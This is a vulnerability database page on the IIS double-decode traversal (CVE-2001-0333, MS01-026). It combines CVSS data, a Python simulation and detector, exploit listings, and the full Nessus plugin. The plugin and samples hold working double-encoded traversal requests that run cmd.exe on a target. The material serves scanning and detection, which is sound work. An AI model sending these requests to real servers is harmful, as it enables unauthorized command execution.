CVE-2001-0333 - Microsoft IIS double-decode directory traversal / remote command execution (MS01-026)

CVSS v2 base score 7.5 (HIGH), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
  • Access vector: NETWORK
  • Access complexity: LOW
  • Authentication: NONE
  • Confidentiality impact: PARTIAL
  • Integrity impact: PARTIAL
  • Availability impact: PARTIAL
Tags: network, low complexity, microsoft, nessus, exploit available, metasploit

Summary

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice (for example as %255c: one decoding pass yields %5c, which passes the traversal check, and a second pass yields "\"). IIS decoded the request once, ran its security checks on that form, then decoded it a second time before opening the file, so the check saw no traversal while the file system did. Fixed by Microsoft in MS01-026; the Nessus plugin on this page also covers MS01-044 (CVE-2001-0507).
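The ordering bug described above, modelled in Python as an added example (a simulation written for this page, not IIS code and not any of the exploits listed on it). The web root and the placement of the /scripts virtual directory are assumptions; the five encodings are the ones the Nessus plugin on this page probes with. `vulnerable_handler` decodes, checks, then decodes again; `fixed_handler` decodes once, checks, and additionally refuses any resolved target outside the web root:

```python
"""Model of the MS01-026 / CVE-2001-0333 double-decode ordering bug.

Added example for this page: a simulation, not IIS code. The web root
layout is an assumption made for the illustration.
"""
from urllib.parse import unquote

WEBROOT = "C:\\Inetpub\\wwwroot"   # assumed; /scripts is taken to live under it

# Request paths whose traversal only appears after a SECOND decoding pass.
# These are the five encodings the Nessus plugin for this CVE tries
# (%255c, %%35c, %%35%63 and %25%35%63 for '\', %252e for '.').
DOUBLE_ENCODED_SAMPLES = [
    "/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe",
    "/scripts/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe",
    "/scripts/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe",
    "/scripts/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe",
    "/scripts//.%252e/.%252e/.%252e/winnt/system32/cmd.exe",
]
# Single-encoded traversal: visible after one pass, so both handlers refuse it.
SINGLE_ENCODED = "/scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe"


def decode_passes(raw_path: str) -> tuple:
    """Return (after one decode, after two decodes) for a raw request path."""
    once = unquote(raw_path)
    return once, unquote(once)


def has_traversal(path: str) -> bool:
    """The security check: does any path segment equal '..'?"""
    return any(seg == ".." for seg in path.replace("\\", "/").split("/"))


def resolve(path: str) -> str:
    """Map a decoded request path onto the file system, collapsing '.' and
    '..' the way the file system would. '..' never climbs above the drive."""
    parts = WEBROOT.split("\\")                 # ['C:', 'Inetpub', 'wwwroot']
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if len(parts) > 1:
                parts.pop()
            continue
        parts.append(seg)
    return "\\".join(parts)


def vulnerable_handler(raw_path: str) -> str:
    """Unpatched order of operations: decode, check, decode AGAIN, open."""
    once, twice = decode_passes(raw_path)   # '%255c' -> '%5c' -> '\'
    if has_traversal(once):                 # the check only sees '%5c'
        return "403 Forbidden"
    return resolve(twice)                   # the file system sees '\'


def fixed_handler(raw_path: str) -> str:
    """Patched order: one decode, then check, then open; plus a containment
    check on the resolved target as defence in depth."""
    once = unquote(raw_path)
    if has_traversal(once):
        return "403 Forbidden"
    target = resolve(once)                  # '%5c' stays a literal segment
    if not (target == WEBROOT or target.startswith(WEBROOT + "\\")):
        return "403 Forbidden"
    return target


if __name__ == "__main__":
    for sample in DOUBLE_ENCODED_SAMPLES + [SINGLE_ENCODED]:
        print(sample)
        print("  vulnerable ->", vulnerable_handler(sample))
        print("  fixed      ->", fixed_handler(sample))
```

Every double-encoded sample reaches C:\winnt\system32\cmd.exe through the vulnerable handler, while the fixed handler resolves them to a non-existent literal name under the web root; the single-encoded form is refused by both, which is why this bug was invisible to checks written for the earlier single-decode traversal.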

Exploit-Db

  • title: Microsoft IIS/PWS CGI Filename Double Decode Command Execution
    description: Microsoft IIS/PWS CGI Filename Double Decode Command Execution. CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:16467
    last seen: 2016-02-01
    modified: 2011-01-08
    published: 2011-01-08
    reporter: metasploit
    source: https://www.exploit-db.com/download/16467/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 1
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20835
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: Filip Maertens
    source: https://www.exploit-db.com/download/20835/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 2
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20836
    last seen: 2016-02-02
    modified: 2001-05-16
    published: 2001-05-16
    reporter: HuXfLuX
    source: https://www.exploit-db.com/download/20836/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 3
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20837
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: Cyrus The Gerat
    source: https://www.exploit-db.com/download/20837/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 4
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20838
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: MovAX
    source: https://www.exploit-db.com/download/20838/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 5
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20839
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: Leif Jakob
    source: https://www.exploit-db.com/download/20839/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 6
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20840
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: A.Ramos
    source: https://www.exploit-db.com/download/20840/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 7
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20841
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: Gary O'Leary-Steele
    source: https://www.exploit-db.com/download/20841/
  • title: Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 8
    description: MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8). CVE-2001-0333. Remote exploit for windows platform
    id: EDB-ID:20842
    last seen: 2016-02-02
    modified: 2001-05-15
    published: 2001-05-15
    reporter: Roelof
    source: https://www.exploit-db.com/download/20842/

Metasploit

title: MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
description: This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory.
id: MSF:EXPLOIT/WINDOWS/IIS/MS01_026_DBLDECODE
last seen: 2020-06-01
modified: 2020-05-19
published: 2010-07-12
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/ms01_026_dbldecode.rb

Nessus

title: MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)
NASL family: Web Servers
NASL id: IIS_DECODE_BUG.NASL
description: When IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10671
published: 2001-05-15
reporter: This script is Copyright (C) 2001-2018 Matt Moore / H D Moore
source: https://www.tenable.com/plugins/nessus/10671
code:
#
# This script was modified by Matt Moore ([email protected])
# from the NASL script to test for the UNICODE directory traversal
# vulnerability, originally written by Renaud Deraison.
#
# Then Renaud took Matt's script and used H D Moore modifications
# to iis_dir_traversal.nasl ;)
#

# Changes by Tenable:
# - Touched up description (11/04/10)
# - Add MSKB script_xref (8/29/17)

include("compat.inc");

if (description)
{
 script_id(10671);
 script_version("1.62");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2001-0333", "CVE-2001-0507");
 script_bugtraq_id(2708, 3193);
 script_xref(name:"MSFT", value:"MS01-026");
 script_xref(name:"MSFT", value:"MS01-044");
 script_xref(name:"MSKB", value:"288855");
 script_xref(name:"MSKB", value:"293826");
 script_xref(name:"MSKB", value:"294370");
 script_xref(name:"MSKB", value:"294774");
 script_xref(name:"MSKB", value:"295534");
 script_xref(name:"MSKB", value:"297860");
 script_xref(name:"MSKB", value:"298340");
 script_xref(name:"MSKB", value:"301625");
 script_xref(name:"MSKB", value:"304867");
 script_xref(name:"MSKB", value:"305359");

 script_name(english:"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)");
 script_summary(english:"Determines if arbitrary commands can be executed");

 script_set_attribute(attribute:"synopsis", value:"Arbitrary commands can be executed on the remote web server.");
 script_set_attribute(attribute:"description", value:
"When IIS receives a user request to run a script, it renders the
request in a decoded canonical form, and then performs security checks
on the decoded request.  A vulnerability results because a second,
superfluous decoding pass is performed after the initial security checks
are completed.  Thus, a specially crafted request could allow an
attacker to execute arbitrary commands on the IIS Server.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044");
 script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/05/15");
 script_set_attribute(attribute:"patch_publication_date", value:"2001/05/15");
 script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/15");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
 script_end_attributes();


 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2020 Matt Moore / H D Moore");
 script_family(english:"Web Servers");
 script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80, embedded:TRUE);

banner = get_http_banner(port:port);
if ( "IIS" >!< banner ) exit(0);

if ( banner =~ "Microsoft-IIS/[6-9]" ) exit(0);

if(!get_port_state(port))exit(0);


dir[0] = "/scripts/";
dir[1] = "/msadc/";
dir[2] = "/iisadmpwd/";
dir[3] = "/_vti_bin/";		# FP
dir[4] = "/_mem_bin/";		# FP
dir[5] = "/exchange/";		# OWA
dir[6] = "/pbserver/";		# Win2K
dir[7] = "/rpc/";		# Win2K
dir[8] = "/cgi-bin/";
dir[9] = "/";

uni[0] = "%255c";  	dots[0] = "..";
uni[1] = "%%35c";	dots[1] = "..";
uni[2] = "%%35%63";	dots[2] = "..";
uni[3] = "%25%35%63";   dots[3] = "..";
uni[4] = "%252e";	dots[4] = "/.";




function check(req)
{
 local_var	r, pat, pat2;
 r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port));
 if(r == NULL)
 {
  exit(0);
 }

 pat = "<DIR>";
 pat2 = "Directory of C";

 if((pat >< r) || (pat2 >< r)){
   security_hole(port:port, extra:
strcat('\n Requesting\n ', build_url(port: port, qs: req), '\n produces :\n\n', r));
   return(1);
 }
 return(0);
}


cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG";
for(d=0;dir[d];d=d+1)
{
	for(i=0;uni[i];i=i+1)
	{
		url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd);
		if(check(req:url))exit(0);
	}
}


# Slight variation- do the same, but don't put dots[i] in front
# of cmd (reported on vuln-dev)

for(d=0;dir[d];d=d+1)
{
	for(i=0;uni[i];i=i+1)
	{
		url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd);
		if(check(req:url))exit(0);
	}
}
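The plugin above is the attacker-side check: build a request for each directory and encoding, then look for a directory listing in the reply. The defender-side counterpart, as an added example written for this page (not Tenable's code and not part of the plugin), classifies raw HTTP request lines by whether a second decoding pass introduces a '..' segment that the first pass did not. The request lines are constructed for the illustration, not captured from a real host:

```python
"""Spot double-encoded traversal (the MS01-026 pattern) in HTTP request lines.

Added example for this page, not part of the Nessus plugin. The request
lines are constructed, not captured traffic.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed samples: what a proxy, IDS or packet capture would show.
SAMPLE_REQUESTS = [
    "GET /default.htm HTTP/1.0",
    "GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\+/OG HTTP/1.0",
    "GET /msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_vti_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe HTTP/1.0",
    "GET /search.asp?q=100%25+pure HTTP/1.0",                        # literal '%' in a query: benign
    "GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe HTTP/1.0",    # single-encoded: visible after one pass
    "GET /cgi-bin//.%252e/.%252e/.%252e/winnt/system32/cmd.exe HTTP/1.0",
]

# A '..' segment bounded by '/', '\' or the ends of the string.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def classify(request_line: str) -> tuple:
    """Return (verdict, decoded_path).

    'traversal'     : a '..' segment is already present after ONE decode
    'double-decode' : none after one decode, but one appears after two
                      (the only shape that got past unpatched IIS's check)
    'clean'         : neither
    """
    _method, target, _version = request_line.split(" ", 2)
    path = urlsplit(target).path        # the query string is not a file-system path
    once = unquote(path)
    twice = unquote(once)
    if TRAVERSAL.search(once):
        return ("traversal", once)
    if twice != once and TRAVERSAL.search(twice):
        return ("double-decode", twice)
    return ("clean", once)


def scan(lines) -> dict:
    """Group request lines by verdict."""
    report = {"double-decode": [], "traversal": [], "clean": []}
    for line in lines:
        verdict, _decoded = classify(line)
        report[verdict].append(line)
    return report


if __name__ == "__main__":
    for verdict, lines in scan(SAMPLE_REQUESTS).items():
        for line in lines:
            print(f"{verdict:13s} {line}")
```

Decoding the path twice and comparing is the whole trick: a benign percent-encoded URL is stable under the second pass, a single-encoded traversal is caught by the first, and only the %255c / %%35c / %25%35%63 / %252e family changes meaning between the two. On an unpatched host this same request shape is what the plugin sends, so the rule doubles as a way to find scanner traffic as well as real exploitation.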


Oval

All four definitions use the CVE summary as their description: "Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice."

  • id: oval:org.mitre.oval:def:37
    title: Windows NT IIS Directory Traversal Command Execution (Test 1)
    class: vulnerability
    family: windows
    status: accepted
    version: 27
    submitted: 2003-10-10T12:00:00.000-04:00
    accepted: 2016-02-08T10:00:00.000-05:00
    contributors:
      • Tiffany Bergeron (The MITRE Corporation)
  • id: oval:org.mitre.oval:def:78
    title: Windows 2000 IIS Directory Traversal Command Execution (Test 1)
    class: vulnerability
    family: windows
    status: accepted
    version: 33
    submitted: 2003-10-10T12:00:00.000-04:00
    accepted: 2011-05-16T04:03:27.809-04:00
    contributors:
      • Tiffany Bergeron (The MITRE Corporation)
      • Shane Shaffer (G2, Inc.)
      • Sudhir Gandhe (Telos)
  • id: oval:org.mitre.oval:def:1018
    title: Windows NT IIS Directory Traversal Command Execution (Test 2)
    class: vulnerability
    family: windows
    status: accepted
    version: 28
    submitted: 2004-05-12T12:00:00.000-04:00
    accepted: 2007-08-02T14:47:14.863-04:00
    contributors:
      • Christine Walzer (The MITRE Corporation)
      • Robert L. Hollis (ThreatGuard, Inc.)
  • id: oval:org.mitre.oval:def:1051
    title: Windows 2000 IIS Directory Traversal Command Execution (Test 2)
    class: vulnerability
    family: windows
    status: accepted
    version: 64
    submitted: 2004-05-12T12:00:00.000-04:00
    accepted: 2004-06-30T12:00:00.000-04:00
    contributors:
      • Christine Walzer (The MITRE Corporation)

Saint

title: iis_double_decode
description: IIS Double Decoding Directory Traversal
id: web_server_iis_double
type: remote
bid: 2708
osvdb: 556